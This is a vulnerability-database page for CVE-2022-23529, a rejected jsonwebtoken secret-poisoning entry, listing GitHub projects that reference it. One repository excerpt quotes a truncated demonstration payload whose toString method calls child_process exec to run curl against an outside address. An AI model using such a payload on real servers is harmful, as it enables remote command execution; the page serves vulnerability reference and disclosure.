Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
NA

CVE-2022-23529

Published: 21/12/2022 Updated: 07/11/2023

Vulnerability Summary

Rejected reason: DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: The issue is not a vulnerability. Notes: none.

Vulnerability Trend

Github Repositories

https://github.com/imexz/ft_transcendence

This project is about creating a website for the mighty Pong contest! Users can play Pong with others. The website provides a nice user interface, a chat, and real-time multiplayer online games!

ft_transcendence This is our ft_transcendence, the last project from the common core of 42 school The project is the result of the collaboration between shackbei, tgrossma, mstrantz, tblaase and kprzybyl ⚠️ This project will no longer be maintained and by now has some security issues that where not public until after we finished this project Here you can read about CVE-20

https://github.com/govindasamyarun/jwt-secret-poisoning

JWT Secret Poisoning (CVE-2022-23529) This project is to demonstrate the exploitation of the JWT Secret Poisoning attack (CVE-2022-23529 Payloads { toString : ()=> {require("child_process")exec(`curl --http09 --location --request GET '1722402:8000/app/info' --header 'Content-Type: application/json'`,(error,stdout,stderr) =&g

References

https://nvd.nist.govhttps://github.com/imexz/ft_transcendence
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
CVE-2023-3675CVE-2024-3400CVE-2024-23557mass assignmentCVE-2023-1389local file inclusionCVE-2024-32596file uploadCVE-2024-32593
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook